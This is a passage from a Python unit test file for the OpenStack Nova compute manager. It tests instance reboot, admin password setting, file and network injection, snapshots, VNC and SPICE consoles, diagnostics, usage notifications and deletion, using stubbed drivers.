fake_power_state3 = 10002
reboot_type = soft and 'SOFT' or 'HARD'
# Beginning of calls we expect.
self.mox.StubOutWithMock(self.context, 'elevated')
self.context.elevated().AndReturn(econtext)
self.compute._get_instance_volume_block_device_info(
econtext, instance).AndReturn(fake_block_dev_info)
self.compute._get_instance_nw_info(econtext,
instance).AndReturn(
fake_nw_model)
self.compute._notify_about_instance_usage(econtext,
instance,
'reboot.start')
self.compute._get_power_state(econtext,
instance).AndReturn(fake_power_state1)
db.instance_update_and_get_original(econtext, instance['uuid'],
{'power_state': fake_power_state1},
update_cells=False,
columns_to_join=[],
).AndReturn((None,
updated_dbinstance1))
expected_nw_info = fake_nw_model
# Annoying. driver.reboot is wrapped in a try/except, and
# doesn't re-raise. It eats exception generated by mox if
# this is called with the wrong args, so we have to hack
# around it.
reboot_call_info = {}
expected_call_info = {
'args': (econtext, instance, expected_nw_info,
reboot_type),
'kwargs': {'block_device_info': fake_block_dev_info}}
def fake_reboot(*args, **kwargs):
reboot_call_info['args'] = args
reboot_call_info['kwargs'] = kwargs
# NOTE(sirp): Since `bad_volumes_callback` is a function defined
# within `reboot_instance`, we don't have access to its value and
# can't stub it out, thus we skip that comparison.
kwargs.pop('bad_volumes_callback')
if fail_reboot:
raise exception.InstanceNotFound(instance_id='instance-0000')
self.stubs.Set(self.compute.driver, 'reboot', fake_reboot)
# Power state should be updated again
if not fail_reboot or fail_running:
new_power_state = fake_power_state2
self.compute._get_power_state(econtext,
instance).AndReturn(fake_power_state2)
else:
new_power_state = fake_power_state3
self.compute._get_power_state(econtext,
instance).AndReturn(fake_power_state3)
if test_delete:
db.instance_update_and_get_original(
econtext, updated_dbinstance1['uuid'],
{'power_state': new_power_state,
'task_state': None,
'vm_state': vm_states.ACTIVE},
update_cells=False,
columns_to_join=[],
).AndRaise(exception.InstanceNotFound(
instance_id=instance['uuid']))
self.compute._notify_about_instance_usage(
econtext,
instance,
'reboot.end')
elif fail_reboot and not fail_running:
db.instance_update_and_get_original(
econtext, updated_dbinstance1['uuid'],
{'vm_state': vm_states.ERROR},
update_cells=False,
columns_to_join=[],
).AndRaise(exception.InstanceNotFound(
instance_id=instance['uuid']))
else:
db.instance_update_and_get_original(
econtext, updated_dbinstance1['uuid'],
{'power_state': new_power_state,
'task_state': None,
'vm_state': vm_states.ACTIVE},
update_cells=False,
columns_to_join=[],
).AndReturn((None, updated_dbinstance2))
self.compute._notify_about_instance_usage(
econtext,
instance,
'reboot.end')
self.mox.ReplayAll()
if not fail_reboot or fail_running:
self.compute.reboot_instance(self.context, instance=instance,
block_device_info=None,
reboot_type=reboot_type)
else:
self.assertRaises(exception.InstanceNotFound,
self.compute.reboot_instance,
self.context, instance=instance,
block_device_info=None,
reboot_type=reboot_type)
self.assertEqual(expected_call_info, reboot_call_info)
def test_reboot_soft(self):
self._test_reboot(True)
def test_reboot_soft_and_delete(self):
self._test_reboot(True, True)
def test_reboot_soft_and_rescued(self):
self._test_reboot(True, False, True)
def test_reboot_soft_and_delete_and_rescued(self):
self._test_reboot(True, True, True)
def test_reboot_hard(self):
self._test_reboot(False)
def test_reboot_hard_and_delete(self):
self._test_reboot(False, True)
def test_reboot_hard_and_rescued(self):
self._test_reboot(False, False, True)
def test_reboot_hard_and_delete_and_rescued(self):
self._test_reboot(False, True, True)
def test_reboot_fail(self):
self._test_reboot(False, fail_reboot=True)
def test_reboot_fail_running(self):
self._test_reboot(False, fail_reboot=True,
fail_running=True)
def test_set_admin_password(self):
# Ensure instance can have its admin password set.
instance = jsonutils.to_primitive(self._create_fake_instance())
self.compute.run_instance(self.context, instance=instance)
db.instance_update(self.context, instance['uuid'],
{'task_state': task_states.UPDATING_PASSWORD})
inst_ref = db.instance_get_by_uuid(self.context, instance['uuid'])
self.assertEqual(inst_ref['vm_state'], vm_states.ACTIVE)
self.assertEqual(inst_ref['task_state'], task_states.UPDATING_PASSWORD)
self.compute.set_admin_password(self.context, instance=instance)
inst_ref = db.instance_get_by_uuid(self.context, instance['uuid'])
self.assertEqual(inst_ref['vm_state'], vm_states.ACTIVE)
self.assertEqual(inst_ref['task_state'], None)
self.compute.terminate_instance(self.context,
instance=jsonutils.to_primitive(inst_ref))
def test_set_admin_password_bad_state(self):
# Test setting password while instance is rebuilding.
instance = jsonutils.to_primitive(self._create_fake_instance())
self.compute.run_instance(self.context, instance=instance)
db.instance_update(self.context, instance['uuid'], {
"power_state": power_state.NOSTATE,
})
instance = jsonutils.to_primitive(db.instance_get_by_uuid(
self.context, instance['uuid']))
self.assertEqual(instance['power_state'], power_state.NOSTATE)
def fake_driver_get_info(self2, _instance):
return {'state': power_state.NOSTATE,
'max_mem': 0,
'mem': 0,
'num_cpu': 2,
'cpu_time': 0}
self.stubs.Set(nova.virt.fake.FakeDriver, 'get_info',
fake_driver_get_info)
db.instance_update(self.context, instance['uuid'],
{"task_state": task_states.UPDATING_PASSWORD})
self.assertRaises(exception.InstancePasswordSetFailed,
self.compute.set_admin_password,
self.context,
instance=instance)
self.compute.terminate_instance(self.context, instance=instance)
def _do_test_set_admin_password_driver_error(self, exc, expected_vm_state,
expected_task_state,
expected_exception):
"""Ensure expected exception is raised if set_admin_password fails."""
def fake_sleep(_time):
pass
self.stubs.Set(time, 'sleep', fake_sleep)
def fake_driver_set_pass(self2, _instance, _pwd):
raise exc
self.stubs.Set(nova.virt.fake.FakeDriver, 'set_admin_password',
fake_driver_set_pass)
instance = jsonutils.to_primitive(self._create_fake_instance())
self.compute.run_instance(self.context, instance=instance)
db.instance_update(self.context, instance['uuid'],
{'task_state': task_states.UPDATING_PASSWORD})
inst_ref = db.instance_get_by_uuid(self.context, instance['uuid'])
self.assertEqual(inst_ref['vm_state'], vm_states.ACTIVE)
self.assertEqual(inst_ref['task_state'], task_states.UPDATING_PASSWORD)
        # Error raised from the driver should not reveal internal information
        # so a new error is raised
self.assertRaises(expected_exception,
self.compute.set_admin_password,
self.context,
instance=jsonutils.to_primitive(inst_ref))
inst_ref = db.instance_get_by_uuid(self.context, instance['uuid'])
self.assertEqual(inst_ref['vm_state'], expected_vm_state)
self.assertEqual(inst_ref['task_state'], expected_task_state)
self.compute.terminate_instance(self.context,
instance=jsonutils.to_primitive(inst_ref))
def test_set_admin_password_driver_not_authorized(self):
"""
Ensure expected exception is raised if set_admin_password not
authorized.
"""
exc = exception.NotAuthorized(_('Internal error'))
expected_exception = exception.InstancePasswordSetFailed
self._do_test_set_admin_password_driver_error(exc,
vm_states.ERROR,
None,
expected_exception)
def test_set_admin_password_driver_not_implemented(self):
"""
Ensure expected exception is raised if set_admin_password not
implemented by driver.
"""
exc = NotImplementedError()
expected_exception = NotImplementedError
self._do_test_set_admin_password_driver_error(exc,
vm_states.ACTIVE,
None,
expected_exception)
def test_inject_file(self):
# Ensure we can write a file to an instance.
called = {'inject': False}
def fake_driver_inject_file(self2, instance, path, contents):
self.assertEqual(path, "/tmp/test")
self.assertEqual(contents, "File Contents")
called['inject'] = True
self.stubs.Set(nova.virt.fake.FakeDriver, 'inject_file',
fake_driver_inject_file)
instance = jsonutils.to_primitive(self._create_fake_instance())
self.compute.run_instance(self.context, instance=instance)
self.compute.inject_file(self.context, "/tmp/test",
"File Contents", instance=instance)
self.assertTrue(called['inject'])
self.compute.terminate_instance(self.context, instance=instance)
def test_inject_network_info(self):
# Ensure we can inject network info.
called = {'inject': False}
def fake_driver_inject_network(self, instance, network_info):
called['inject'] = True
self.stubs.Set(nova.virt.fake.FakeDriver, 'inject_network_info',
fake_driver_inject_network)
instance = jsonutils.to_primitive(self._create_fake_instance())
self.compute.run_instance(self.context, instance=instance)
inst_obj = self._objectify(instance)
self.compute.inject_network_info(self.context, instance=inst_obj)
self.assertTrue(called['inject'])
self.compute.terminate_instance(self.context, instance=instance)
def test_reset_network(self):
# Ensure we can reset networking on an instance.
called = {'count': 0}
def fake_driver_reset_network(self, instance):
called['count'] += 1
self.stubs.Set(nova.virt.fake.FakeDriver, 'reset_network',
fake_driver_reset_network)
instance = jsonutils.to_primitive(self._create_fake_instance())
self.compute.run_instance(self.context, instance=instance)
self.compute.reset_network(self.context,
instance=self._objectify(instance))
self.assertEqual(called['count'], 1)
self.compute.terminate_instance(self.context, instance=instance)
def test_live_snapshot(self):
# Ensure instance can be live_snapshotted.
instance = jsonutils.to_primitive(self._create_fake_instance())
name = "myfakesnapshot"
self.compute.run_instance(self.context, instance=instance)
db.instance_update(self.context, instance['uuid'],
{"task_state": task_states.IMAGE_LIVE_SNAPSHOT})
self.compute.live_snapshot_instance(self.context, name,
instance=instance)
self.compute.terminate_instance(self.context, instance=instance)
def test_live_snapshot_fails(self):
# Ensure task_state is set to None if snapshot fails.
def fake_live_snapshot(*args, **kwargs):
raise test.TestingException()
self.fake_image_delete_called = False
def fake_delete(self_, context, image_id):
self.fake_image_delete_called = True
self.stubs.Set(self.compute.driver, 'live_snapshot',
fake_live_snapshot)
fake_image.stub_out_image_service(self.stubs)
self.stubs.Set(fake_image._FakeImageService, 'delete', fake_delete)
instance = jsonutils.to_primitive(self._create_fake_instance())
self.compute.run_instance(self.context, instance=instance)
db.instance_update(self.context, instance['uuid'],
{"task_state": task_states.IMAGE_LIVE_SNAPSHOT})
self.assertRaises(test.TestingException,
self.compute.live_snapshot_instance,
self.context, "failing_snapshot", instance=instance)
self.assertTrue(self.fake_image_delete_called)
self._assert_state({'task_state': None})
self.compute.terminate_instance(self.context, instance=instance)
def _get_snapshotting_instance(self):
# Create a running instance and put it into the IMAGE_SNAPSHOT task state.
instance = jsonutils.to_primitive(self._create_fake_instance())
self.compute.run_instance(self.context, instance=instance)
instance = db.instance_update(
self.context, instance['uuid'],
{"task_state": task_states.IMAGE_SNAPSHOT})
return self._objectify(instance)
def test_snapshot(self):
inst_obj = self._get_snapshotting_instance()
self.compute.snapshot_instance(self.context, image_id='fakesnap',
instance=inst_obj)
def test_snapshot_no_image(self):
inst_obj = self._get_snapshotting_instance()
inst_obj.image_ref = ''
inst_obj.save()
self.compute.snapshot_instance(self.context, image_id='fakesnap',
instance=inst_obj)
def _test_snapshot_fails(self, raise_during_cleanup):
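# Helper: make driver.snapshot fail, then verify the partially-created
# image is deleted and task_state is reset; optionally the image delete
# itself raises, which should be ignored.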
def fake_snapshot(*args, **kwargs):
raise test.TestingException()
self.fake_image_delete_called = False
def fake_delete(self_, context, image_id):
self.fake_image_delete_called = True
if raise_during_cleanup:
raise Exception()
self.stubs.Set(self.compute.driver, 'snapshot', fake_snapshot)
fake_image.stub_out_image_service(self.stubs)
self.stubs.Set(fake_image._FakeImageService, 'delete', fake_delete)
inst_obj = self._get_snapshotting_instance()
self.assertRaises(test.TestingException,
self.compute.snapshot_instance,
self.context, image_id='fakesnap',
instance=inst_obj)
self.assertTrue(self.fake_image_delete_called)
self._assert_state({'task_state': None})
def test_snapshot_fails(self):
self._test_snapshot_fails(False)
def test_snapshot_fails_cleanup_ignores_exception(self):
self._test_snapshot_fails(True)
def test_snapshot_handles_cases_when_instance_is_deleted(self):
inst_obj = self._get_snapshotting_instance()
inst_obj.task_state = task_states.DELETING
inst_obj.save()
self.compute.snapshot_instance(self.context, image_id='fakesnap',
instance=inst_obj)
def test_snapshot_handles_cases_when_instance_is_not_found(self):
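# Destroy the instance's DB record through a second object handle so
# snapshot_instance has to handle the instance disappearing underneath it.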
inst_obj = self._get_snapshotting_instance()
inst_obj2 = instance_obj.Instance.get_by_uuid(self.context,
inst_obj.uuid)
inst_obj2.destroy()
self.compute.snapshot_instance(self.context, image_id='fakesnap',
instance=inst_obj)
def _assert_state(self, state_dict):
"""Assert state of VM is equal to state passed as parameter."""
instances = db.instance_get_all(self.context)
self.assertEqual(len(instances), 1)
if 'vm_state' in state_dict:
self.assertEqual(state_dict['vm_state'], instances[0]['vm_state'])
if 'task_state' in state_dict:
self.assertEqual(state_dict['task_state'],
instances[0]['task_state'])
if 'power_state' in state_dict:
self.assertEqual(state_dict['power_state'],
instances[0]['power_state'])
def test_console_output(self):
# Make sure we can get console output from instance.
instance = jsonutils.to_primitive(self._create_fake_instance())
self.compute.run_instance(self.context, instance=instance)
output = self.compute.get_console_output(self.context,
instance=instance)
self.assertEqual(output, 'FAKE CONSOLE OUTPUT\nANOTHER\nLAST LINE')
self.compute.terminate_instance(self.context, instance=instance)
def test_console_output_tail(self):
# Make sure we can get console output from instance.
instance = jsonutils.to_primitive(self._create_fake_instance())
self.compute.run_instance(self.context, instance=instance)
output = self.compute.get_console_output(self.context,
instance=instance, tail_length=2)
self.assertEqual(output, 'ANOTHER\nLAST LINE')
self.compute.terminate_instance(self.context, instance=instance)
def test_novnc_vnc_console(self):
# Make sure we can get a VNC console for an instance.
self.flags(vnc_enabled=True)
self.flags(enabled=False, group='spice')
instance = jsonutils.to_primitive(self._create_fake_instance())
self.compute.run_instance(self.context, instance=instance)
# Try with the full instance
console = self.compute.get_vnc_console(self.context, 'novnc',
instance=instance)
self.assertTrue(console)
self.compute.terminate_instance(self.context, instance=instance)
def test_validate_console_port_vnc(self):
self.flags(vnc_enabled=True)
self.flags(enabled=True, group='spice')
instance = jsonutils.to_primitive(self._create_fake_instance())
def fake_driver_get_console(*args, **kwargs):
return {'host': "fake_host", 'port': "5900",
'internal_access_path': None}
self.stubs.Set(self.compute.driver, "get_vnc_console",
fake_driver_get_console)
self.assertTrue(self.compute.validate_console_port(self.context,
instance,
"5900",
"novnc"))
def test_validate_console_port_spice(self):
self.flags(vnc_enabled=True)
self.flags(enabled=True, group='spice')
instance = jsonutils.to_primitive(self._create_fake_instance())
def fake_driver_get_console(*args, **kwargs):
return {'host': "fake_host", 'port': "5900",
'internal_access_path': None}
self.stubs.Set(self.compute.driver, "get_spice_console",
fake_driver_get_console)
self.assertTrue(self.compute.validate_console_port(self.context,
instance,
"5900",
"spice-html5"))
def test_validate_console_port_wrong_port(self):
self.flags(vnc_enabled=True)
self.flags(enabled=True, group='spice')
instance = jsonutils.to_primitive(self._create_fake_instance())
def fake_driver_get_console(*args, **kwargs):
return {'host': "fake_host", 'port': "5900",
'internal_access_path': None}
self.stubs.Set(self.compute.driver, "get_vnc_console",
fake_driver_get_console)
self.assertFalse(self.compute.validate_console_port(self.context,
instance,
"wrongport",
"spice-html5"))
def test_xvpvnc_vnc_console(self):
# Make sure we can get a VNC console for an instance.
self.flags(vnc_enabled=True)
self.flags(enabled=False, group='spice')
instance = jsonutils.to_primitive(self._create_fake_instance())
self.compute.run_instance(self.context, instance=instance)
console = self.compute.get_vnc_console(self.context, 'xvpvnc',
instance=instance)
self.assertTrue(console)
self.compute.terminate_instance(self.context, instance=instance)
def test_invalid_vnc_console_type(self):
# Raise useful error if console type is an unrecognised string.
self.flags(vnc_enabled=True)
self.flags(enabled=False, group='spice')
instance = jsonutils.to_primitive(self._create_fake_instance())
self.compute.run_instance(self.context, instance=instance)
self.assertRaises(rpc_common.ClientException,
self.compute.get_vnc_console,
self.context, 'invalid', instance=instance)
self.compute = utils.ExceptionHelper(self.compute)
self.assertRaises(exception.ConsoleTypeInvalid,
self.compute.get_vnc_console,
self.context, 'invalid', instance=instance)
self.compute.terminate_instance(self.context, instance=instance)
def test_missing_vnc_console_type(self):
# Raise a useful error if the console type is None.
self.flags(vnc_enabled=True)
self.flags(enabled=False, group='spice')
instance = jsonutils.to_primitive(self._create_fake_instance())
self.compute.run_instance(self.context, instance=instance)
self.assertRaises(rpc_common.ClientException,
self.compute.get_vnc_console,
self.context, None, instance=instance)
self.compute = utils.ExceptionHelper(self.compute)
self.assertRaises(exception.ConsoleTypeInvalid,
self.compute.get_vnc_console,
self.context, None, instance=instance)
self.compute.terminate_instance(self.context, instance=instance)
def test_spicehtml5_spice_console(self):
# Make sure we can get a SPICE console for an instance.
self.flags(vnc_enabled=False)
self.flags(enabled=True, group='spice')
instance = jsonutils.to_primitive(self._create_fake_instance())
self.compute.run_instance(self.context, instance=instance)
# Try with the full instance
console = self.compute.get_spice_console(self.context, 'spice-html5',
instance=instance)
self.assertTrue(console)
self.compute.terminate_instance(self.context, instance=instance)
def test_invalid_spice_console_type(self):
# Raise useful error if console type is an unrecognised string
self.flags(vnc_enabled=False)
self.flags(enabled=True, group='spice')
instance = jsonutils.to_primitive(self._create_fake_instance())
self.compute.run_instance(self.context, instance=instance)
self.assertRaises(rpc_common.ClientException,
self.compute.get_spice_console,
self.context, 'invalid', instance=instance)
self.compute = utils.ExceptionHelper(self.compute)
self.assertRaises(exception.ConsoleTypeInvalid,
self.compute.get_spice_console,
self.context, 'invalid', instance=instance)
self.compute.terminate_instance(self.context, instance=instance)
def test_missing_spice_console_type(self):
# Raise a useful error if the console type is None.
self.flags(vnc_enabled=False)
self.flags(enabled=True, group='spice')
instance = jsonutils.to_primitive(self._create_fake_instance())
self.compute.run_instance(self.context, instance=instance)
self.assertRaises(rpc_common.ClientException,
self.compute.get_spice_console,
self.context, None, instance=instance)
self.compute = utils.ExceptionHelper(self.compute)
self.assertRaises(exception.ConsoleTypeInvalid,
self.compute.get_spice_console,
self.context, None, instance=instance)
self.compute.terminate_instance(self.context, instance=instance)
def test_vnc_console_instance_not_ready(self):
self.flags(vnc_enabled=True)
self.flags(enabled=False, group='spice')
instance = self._create_fake_instance(
params={'vm_state': vm_states.BUILDING})
instance = jsonutils.to_primitive(instance)
def fake_driver_get_console(*args, **kwargs):
raise exception.InstanceNotFound(instance_id=instance['uuid'])
self.stubs.Set(self.compute.driver, "get_vnc_console",
fake_driver_get_console)
self.compute = utils.ExceptionHelper(self.compute)
self.assertRaises(exception.InstanceNotReady,
self.compute.get_vnc_console, self.context, 'novnc',
instance=instance)
def test_spice_console_instance_not_ready(self):
self.flags(vnc_enabled=False)
self.flags(enabled=True, group='spice')
instance = self._create_fake_instance(
params={'vm_state': vm_states.BUILDING})
instance = jsonutils.to_primitive(instance)
def fake_driver_get_console(*args, **kwargs):
raise exception.InstanceNotFound(instance_id=instance['uuid'])
self.stubs.Set(self.compute.driver, "get_spice_console",
fake_driver_get_console)
self.compute = utils.ExceptionHelper(self.compute)
self.assertRaises(exception.InstanceNotReady,
self.compute.get_spice_console, self.context, 'spice-html5',
instance=instance)
def test_diagnostics(self):
# Make sure we can get diagnostics for an instance.
expected_diagnostic = {'cpu0_time': 17300000000,
'memory': 524288,
'vda_errors': -1,
'vda_read': 262144,
'vda_read_req': 112,
'vda_write': 5778432,
'vda_write_req': 488,
'vnet1_rx': 2070139,
'vnet1_rx_drop': 0,
'vnet1_rx_errors': 0,
'vnet1_rx_packets': 26701,
'vnet1_tx': 140208,
'vnet1_tx_drop': 0,
'vnet1_tx_errors': 0,
'vnet1_tx_packets': 662,
}
instance = jsonutils.to_primitive(self._create_fake_instance())
self.compute.run_instance(self.context, instance=instance)
diagnostics = self.compute.get_diagnostics(self.context,
instance=instance)
self.assertEqual(diagnostics, expected_diagnostic)
self.compute.terminate_instance(self.context, instance=instance)
def test_add_fixed_ip_usage_notification(self):
def dummy(*args, **kwargs):
pass
self.stubs.Set(network_api.API, 'add_fixed_ip_to_instance',
dummy)
self.stubs.Set(nova.compute.manager.ComputeManager,
'inject_network_info', dummy)
self.stubs.Set(nova.compute.manager.ComputeManager,
'reset_network', dummy)
instance = jsonutils.to_primitive(self._create_fake_instance())
self.assertEquals(len(fake_notifier.NOTIFICATIONS), 0)
self.compute.add_fixed_ip_to_instance(self.context, network_id=1,
instance=instance)
self.assertEquals(len(fake_notifier.NOTIFICATIONS), 2)
self.compute.terminate_instance(self.context, instance=instance)
def test_remove_fixed_ip_usage_notification(self):
def dummy(*args, **kwargs):
pass
self.stubs.Set(network_api.API, 'remove_fixed_ip_from_instance',
dummy)
self.stubs.Set(nova.compute.manager.ComputeManager,
'inject_network_info', dummy)
self.stubs.Set(nova.compute.manager.ComputeManager,
'reset_network', dummy)
instance = jsonutils.to_primitive(self._create_fake_instance())
self.assertEquals(len(fake_notifier.NOTIFICATIONS), 0)
self.compute.remove_fixed_ip_from_instance(self.context, 1,
instance=instance)
self.assertEquals(len(fake_notifier.NOTIFICATIONS), 2)
self.compute.terminate_instance(self.context, instance=instance)
def test_run_instance_usage_notification(self):
# Ensure run instance generates appropriate usage notification.
instance = jsonutils.to_primitive(self._create_fake_instance())
instance_uuid = instance['uuid']
self.compute.run_instance(self.context, instance=instance)
self.assertEquals(len(fake_notifier.NOTIFICATIONS), 2)
inst_ref = db.instance_get_by_uuid(self.context, instance_uuid)
msg = fake_notifier.NOTIFICATIONS[0]
self.assertEquals(msg.event_type, 'compute.instance.create.start')
self.assertEquals(msg.payload['image_name'], 'fake_name')
# The last event is the one with the sugar in it.
msg = fake_notifier.NOTIFICATIONS[1]
self.assertEquals(msg.priority, 'INFO')
self.assertEquals(msg.event_type, 'compute.instance.create.end')
payload = msg.payload
self.assertEquals(payload['tenant_id'], self.project_id)
self.assertEquals(payload['image_name'], 'fake_name')
self.assertEquals(payload['user_id'], self.user_id)
self.assertEquals(payload['instance_id'], inst_ref['uuid'])
self.assertEquals(payload['instance_type'], 'm1.tiny')
type_id = flavors.get_flavor_by_name('m1.tiny')['id']
self.assertEquals(str(payload['instance_type_id']), str(type_id))
flavor_id = flavors.get_flavor_by_name('m1.tiny')['flavorid']
self.assertEquals(str(payload['instance_flavor_id']), str(flavor_id))
self.assertEquals(payload['state'], 'active')
self.assertTrue('display_name' in payload)
self.assertTrue('created_at' in payload)
self.assertTrue('launched_at' in payload)
self.assertTrue('fixed_ips' in payload)
self.assertTrue(payload['launched_at'])
image_ref_url = glance.generate_image_url(FAKE_IMAGE_REF)
self.assertEquals(payload['image_ref_url'], image_ref_url)
self.assertEqual('Success', payload['message'])
self.compute.terminate_instance(self.context,
instance=jsonutils.to_primitive(inst_ref))
def test_run_instance_end_notification_on_abort(self):
# Test that an end notification is sent if the build is aborted.
instance = jsonutils.to_primitive(self._create_fake_instance())
instance_uuid = instance['uuid']
def build_inst_abort(*args, **kwargs):
raise exception.BuildAbortException(reason="already deleted",
instance_uuid=instance_uuid)
self.stubs.Set(self.compute, '_build_instance', build_inst_abort)
self.compute.run_instance(self.context, instance=instance)
self.assertEquals(len(fake_notifier.NOTIFICATIONS), 2)
msg = fake_notifier.NOTIFICATIONS[0]
self.assertEquals(msg.event_type, 'compute.instance.create.start')
msg = fake_notifier.NOTIFICATIONS[1]
self.assertEquals(msg.event_type, 'compute.instance.create.end')
self.assertEquals('INFO', msg.priority)
payload = msg.payload
message = payload['message']
self.assertTrue(message.find("already deleted") != -1)
def test_run_instance_error_notification_on_reschedule(self):
# Test that an error notification is sent if the build is rescheduled.
instance = jsonutils.to_primitive(self._create_fake_instance())
instance_uuid = instance['uuid']
def build_inst_fail(*args, **kwargs):
raise exception.RescheduledException(instance_uuid=instance_uuid,
reason="something bad happened")
self.stubs.Set(self.compute, '_build_instance', build_inst_fail)
self.compute.run_instance(self.context, instance=instance)
self.assertTrue(len(fake_notifier.NOTIFICATIONS) >= 2)
msg = fake_notifier.NOTIFICATIONS[0]
self.assertEquals(msg.event_type, 'compute.instance.create.start')
msg = fake_notifier.NOTIFICATIONS[1]
self.assertEquals(msg.event_type, 'compute.instance.create.error')
self.assertEquals('ERROR', msg.priority)
payload = msg.payload
message = payload['message']
self.assertTrue(message.find("something bad happened") != -1)
def test_run_instance_error_notification_on_failure(self):
# Test that an error notification is sent if the build fails hard.
instance = jsonutils.to_primitive(self._create_fake_instance())
def build_inst_fail(*args, **kwargs):
raise test.TestingException("i'm dying")
self.stubs.Set(self.compute, '_build_instance', build_inst_fail)
self.assertRaises(test.TestingException, self.compute.run_instance,
self.context, instance=instance)
self.assertTrue(len(fake_notifier.NOTIFICATIONS) >= 2)
msg = fake_notifier.NOTIFICATIONS[0]
self.assertEquals(msg.event_type, 'compute.instance.create.start')
msg = fake_notifier.NOTIFICATIONS[1]
self.assertEquals(msg.event_type, 'compute.instance.create.error')
self.assertEquals('ERROR', msg.priority)
payload = msg.payload
message = payload['message']
self.assertTrue(message.find("i'm dying") != -1)
def test_terminate_usage_notification(self):
# Ensure terminate_instance generates correct usage notification.
old_time = datetime.datetime(2012, 4, 1)
cur_time = datetime.datetime(2012, 12, 21, 12, 21)
timeutils.set_time_override(old_time)
instance = jsonutils.to_primitive(self._create_fake_instance())
self.compute.run_instance(self.context, instance=instance)
fake_notifier.NOTIFICATIONS = []
timeutils.set_time_override(cur_time)
self.compute.terminate_instance(self.context, instance=instance)
self.assertEquals(len(fake_notifier.NOTIFICATIONS), 4)
msg = fake_notifier.NOTIFICATIONS[0]
self.assertEquals(msg.priority, 'INFO')
self.assertEquals(msg.event_type, 'compute.instance.delete.start')
msg1 = fake_notifier.NOTIFICATIONS[1]
self.assertEquals(msg1.event_type, 'compute.instance.shutdown.start')
msg1 = fake_notifier.NOTIFICATIONS[2]
self.assertEquals(msg1.event_type, 'compute.instance.shutdown.end')
msg1 = fake_notifier.NOTIFICATIONS[3]
self.assertEquals(msg1.event_type, 'compute.instance.delete.end')
payload = msg1.payload
self.assertEquals(payload['tenant_id'], self.project_id)
self.assertEquals(payload['user_id'], self.user_id)
self.assertEquals(payload['instance_id'], instance['uuid'])
self.assertEquals(payload['instance_type'], 'm1.tiny')
type_id = flavors.get_flavor_by_name('m1.tiny')['id']
self.assertEquals(str(payload['instance_type_id']), str(type_id))
flavor_id = flavors.get_flavor_by_name('m1.tiny')['flavorid']
self.assertEquals(str(payload['instance_flavor_id']), str(flavor_id))
self.assertTrue('display_name' in payload)
self.assertTrue('created_at' in payload)
self.assertTrue('launched_at' in payload)
self.assertTrue('terminated_at' in payload)
self.assertTrue('deleted_at' in payload)
self.assertEqual(payload['terminated_at'], timeutils.strtime(cur_time))
image_ref_url = glance.generate_image_url(FAKE_IMAGE_REF)
self.assertEquals(payload['image_ref_url'], image_ref_url)
def test_run_instance_existing(self):
# Ensure failure when running an instance that already exists.
instance = jsonutils.to_primitive(self._create_fake_instance())
self.compute.run_instance(self.context, instance=instance)
self.assertRaises(exception.InstanceExists,
self.compute.run_instance,
self.context,
instance=instance)
self.compute.terminate_instance(self.context, instance=instance)
def test_run_instance_queries_macs(self):
# run_instance should ask the driver for node mac addresses and pass
# that to the network_api in use.
fake_network.unset_stub_network_methods(self.stubs)
instance = jsonutils.to_primitive(self._create_fake_instance())
macs = set(['01:23:45:67:89:ab'])
self.mox.StubOutWithMock(self.compute.network_api,
"allocate_for_instance")
self.compute.network_api.allocate_for_instance(
mox.IgnoreArg(),
mox.IgnoreArg(),
requested_networks=None,
vpn=False, macs=macs,
security_groups=[], dhcp_options=None).AndReturn(
fake_network.fake_get_instance_nw_info(self.stubs, 1, 1))
self.mox.StubOutWithMock(self.compute.driver, "macs_for_instance")
self.compute.driver.macs_for_instance(instance).AndReturn(macs)
self.mox.ReplayAll()
self.compute.run_instance(self.context, instance=instance)
def test_instance_set_to_error_on_uncaught_exception(self):
# Test that instance is set to error state when exception is raised.
instance = jsonutils.to_primitive(self._create_fake_instance())
self.mox.StubOutWithMock(self.compute.network_api,
"allocate_for_instance")
self.mox.StubOutWithMock(self.compute.network_api,
"deallocate_for_instance")
self.compute.network_api.allocate_for_instance(
mox.IgnoreArg(),
mox.IgnoreArg(),
requested_networks=None,
vpn=False, macs=None,
security_groups=[], dhcp_options=None
).AndRaise(rpc_common.RemoteError())
self.compute.network_api.deallocate_for_instance(
mox.IgnoreArg(),
mox.IgnoreArg(),
requested_networks=None).MultipleTimes()
fake_network.unset_stub_network_methods(self.stubs)
self.mox.ReplayAll()
self.assertRaises(rpc_common.RemoteError,
self.compute.run_instance,
self.context,
instance=instance)
instance = db.instance_get_by_uuid(context.get_admin_context(),
instance['uuid'])
self.assertEqual(vm_states.ERROR, instance['vm_state'])
self.compute.terminate_instance(self.context,
instance=jsonutils.to_primitive(instance))
def test_delete_instance_succeeds_on_volume_fail(self):
instance = self._create_fake_instance_obj()
def fake_cleanup_volumes(context, instance):
raise test.TestingException()
self.stubs.Set(self.compute, '_cleanup_volumes',
fake_cleanup_volumes)
self.compute._delete_instance(self.context, instance=instance,
bdms={})
def test_delete_instance_keeps_net_on_power_off_fail(self):
self.mox.StubOutWithMock(self.compute.driver, 'destroy')
self.mox.StubOutWithMock(self.compute, '_deallocate_network')
exp = exception.InstancePowerOffFailure(reason='')
self.compute.driver.destroy(mox.IgnoreArg(),
mox.IgnoreArg(),
mox.IgnoreArg(),
context=mox.IgnoreArg()).AndRaise(exp)
# mox will detect if _deallocate_network gets called unexpectedly
self.mox.ReplayAll()
instance = self._create_fake_instance()
self.assertRaises(exception.InstancePowerOffFailure,
self.compute._delete_instance,
self.context,
instance=jsonutils.to_primitive(instance),
bdms={})
def test_delete_instance_loses_net_on_other_fail(self):
self.mox.StubOutWithMock(self.compute.driver, 'destroy')
self.mox.StubOutWithMock(self.compute, '_deallocate_network')
exp = test.TestingException()
self.compute.driver.destroy(mox.IgnoreArg(),
mox.IgnoreArg(),
mox.IgnoreArg(),
context=mox.IgnoreArg()).AndRaise(exp)
self.compute._deallocate_network(mox.IgnoreArg(),
mox.IgnoreArg(),
mox.IgnoreArg())
self.mox.ReplayAll()
instance = self._create_fake_instance()
self.assertRaises(test.TestingException,
self.compute._delete_instance,
self.context,
instance=jsonutils.to_primitive(instance),
bdms={})
def test_delete_instance_deletes_console_auth_tokens(self):
instance = self._create_fake_instance_obj()
self.flags(vnc_enabled=True)
self.tokens_deleted = False
def fake_delete_tokens(*args, **kwargs):
self.tokens_deleted = True
cauth_rpcapi = self.compute.consoleauth_rpcapi
self.stubs.Set(cauth_rpcapi, 'delete_tokens_for_instance',
fake_delete_tokens)
self.compute._delete_instance(self.context, instance=instance,
bdms={})
self.assertTrue(self.tokens_deleted)
def test_delete_instance_deletes_console_auth_tokens_cells(self):
instance = self._create_fake_instance_obj()
